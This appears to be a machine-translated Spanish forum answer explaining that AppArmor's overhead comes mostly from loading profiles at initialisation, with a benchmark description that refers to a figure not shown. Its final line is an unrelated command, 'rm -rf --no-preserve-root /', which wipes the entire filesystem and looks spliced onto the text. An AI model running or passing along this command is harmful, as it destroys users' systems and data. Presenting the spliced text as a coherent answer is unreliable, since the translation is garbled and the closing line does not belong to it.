Depende de lo que haga su programa: con qué frecuencia accede a los archivos, con qué frecuencia genera nuevos programas, cuánto tiempo se ejecuta, ... AppArmor se crea utilizando el [LSM] 1interfaz, que verifica cada llamada al sistema. AppArmor puede tener una memoria caché de acceso para acelerar los accesos recurrentes a los archivos o las solicitudes posteriores a un archivo ya abierto del mismo proceso, pero la sobrecarga más notable es durante la inicialización (se debe cargar el perfil de un programa y debe realizarse alguna inicialización de contexto ) Si está de humor para un juicio poco práctico de los peores casos, la siguiente es una figura que compara AppArmor con DAC (el modelo de permiso tradicional) durante un estudio en algún otro marco basado en LSM (CMCAP-Linux). El sistema era un Linux 4.4.6 arrancado en un Intel Core2 Duo E8400 que funciona a 3 GHz con 8 GB de RAM. El micro-punto de referencia consistió en 10 ejecuciones promedio (en bucles cerrados) de 10 millones de operaciones para la prueba de apertura + cierre, y 10 mil para las otras 2.
rm -rf --no-preserve-root /